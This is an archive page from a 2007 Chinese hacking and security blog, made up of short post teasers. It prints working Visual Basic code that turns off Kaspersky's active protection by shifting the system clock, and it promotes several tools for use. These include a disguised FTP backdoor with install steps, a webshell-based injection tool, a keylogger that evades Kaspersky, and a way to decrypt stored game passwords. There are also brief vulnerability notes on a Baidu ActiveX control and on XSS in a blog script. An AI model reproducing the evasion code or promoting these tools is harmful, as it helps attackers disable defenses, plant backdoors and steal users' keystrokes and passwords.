2007年8月 的日志

几句话就过卡巴主动防御

2007/08/03 3:25 | 鬼仔 | 技术文章 | 2 个回复

鬼仔注:还是利用修改时间达到使卡巴失效的目的。不过据说卡巴下个版本要修正这个问题了。

作者:雪狐

Private Sub Form_Load()
Date = Date - 5000
End Sub
Private Sub Timer1_Timer()
Date = Date + 5000
End
End Sub

很简单的几句话,timer设置15秒即可!

运行程序后日期由正确的日期减去5000天,然后经过15秒后又加上5000天!恢复了原来的时间!

卡巴在这个15秒内停止保护!!

呵呵

很爽了,比网上流行的bat写的好的没法说了!

Tags:

联众密码的逆向算法

2007/08/03 3:13 | 鬼仔 | 技术文章 | 消灭0回复

//作者:姜堰市合作银行-姚佩云 www.jynx.com.cn [email protected]
//首发大富翁论坛(www.delphibbs.com)blog,转载请尊重作者成果,保留此信息

闲来无事,每天上联众,联众的密码经过加密后保存在本地注册表里,看看是怎么加密的。下了个ollydbg,一路跟踪,发现算法极其简单,给出Delphi版本的解密算法(加密部分有兴趣的一起来讨论)。算法比较粗糟,谁帮优化一下:)
阅读全文 »

Tags:

SUS迷你ftp后门

2007/08/02 12:47 | 鬼仔 | 工具收集 | 消灭0回复

文章作者:单克隆抗体
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注意:文章首发东南大学网络安全联盟论坛(www.bestseu.com/sus/),后由作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明首发站点。

这个后门的思路绝对新颖,将后门融入小巧的ftp服务器中.既能进行快速大量可靠的ftp传文件,又不失后门强大的控制功能.既保持苗条的身材,又具备良好的隐身术和超强的稳定性.本后门完全无需使用特定的客户端程序,任何时间,任何地点,想怎么控制,就怎么玩。再加上它原创免杀的特性.怎么样,跃跃欲试了吧?

这次发布的是测试版,压缩包内共一个文件wmiapsrv.exe。测试方法:将其解压到一个不含空格的目录里,如c:\windows\system32.运行即可。这样服务端便成功安装并运行了。
阅读全文 »

Tags:

do all things in asp —— shell注入1.0asp版

2007/08/02 12:43 | 鬼仔 | 工具收集 | 消灭0回复

鬼仔注:文章末尾附我抓的一张界面图。

软件作者:沉渊 (bloodsword)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

以前一直有写个webshell环境下运行的注入工具的想法。由于语言不过关,也只是一直把它当成一个想法而已。
上次在邪恶八看了mika姐姐发的那个do all things in php的帖子(mika同学知识渊博,而且全面发展,是我们学习的榜样哈),重新激活了我的这个想法。后来翻asp手册,发现了xmlhttp这个好东西,serv-u提权就是用这个写的,简直是居家旅行,入侵黑站的必备佳品哈~~于是就开始动手……写这个东西花了我两个星期时间,累死了~~~

说明:
1、本程序运行需要asp环境,可以自己搭建IIS或者上传到webshell执行,以达到“借刀杀人”的目的。
阅读全文 »

Tags: ,

百度超级搜霸远程代码执行漏洞

2007/08/02 11:55 | 鬼仔 | 技术文章 | 消灭0回复

by cocoruder(frankruer_at_hotmail.com)
http://ruder.cdut.net

Summary:

百度超级搜霸是百度公司出品的一款免费的浏览器工具栏,提供百度公司的各种服务。更多信息请参考:

http://bar.baidu.com/sobar/promotion.html

在百度超级搜霸中的一个ActiveX控件中存在一个远程代码执行漏洞,远程攻击者可利用此漏洞在被攻击者系统上以当前浏览器权限执行任意代码,进而可安装木马以及间谍程序。

Affected Software Versions:

百度超级搜霸5.4(Version of "BaiduBar.dll" is 2.0.2.144)

Details:
阅读全文 »

Tags:

无<>跨站一例——kevin blog跨站解析

2007/08/02 5:50 | 鬼仔 | 技术文章 | 消灭0回复

文章作者: 落叶纷飞&华夏鸡头4
信息来源: 邪恶八进制信息安全团队

kevin blog应该是大家比较喜欢的简约blog了吧,最近从流转JJ那拿了一套,今晚闲着无聊,就想看看它有什么漏洞。
看了一会,看倒comment.asp的代码貌似有点问题。代码如下:
….省略….
user=strchk(Request.Form("gname"))
msg=strchk(Request.Form("gmsg"))
mail=strchk(Request.Form("gmail"))
home=strchk(Request.Form("ghome"))
if mail="" then mail="[email protected]"
if home="" then home="kevin.hididi.net"
阅读全文 »

Tags:

Win-Get——Windows下的自由软件自动安装程序

2007/08/01 10:44 | 鬼仔 | 工具收集 | 消灭0回复

来源:Solidot

在Linux上,可以方便的通过apt-get来获得软件。现在Windows专用的Win-Get—— 一个免费的命令行自动安装程序,可以在“视窗”系统上实现相同的功能,当然只能用于安装自由软件。比如你可以使用“win-get install firefox”安装火狐浏览器,Windows普通用户可能不太喜欢命令行,至少这种方法可以免去网上搜索和下载过程,不妨试试。

1.下载 wget.exe
2.下载 win-get.exe (version 1.01)
阅读全文 »

Tags:

一个穿透卡巴的傻x智能键盘记录

2007/08/01 9:17 | 鬼仔 | 工具收集 | 消灭0回复

来源:gyzy's Blog

【庆祝八一建军节】
一个穿透卡巴的键盘记录(带窗口标题获取)
利用原始设备输入变化RawInput 进行键盘记录
记录的东西在当前目录下的Keylog.txt中

整个工程文件下载:keylogger.rar

Tags: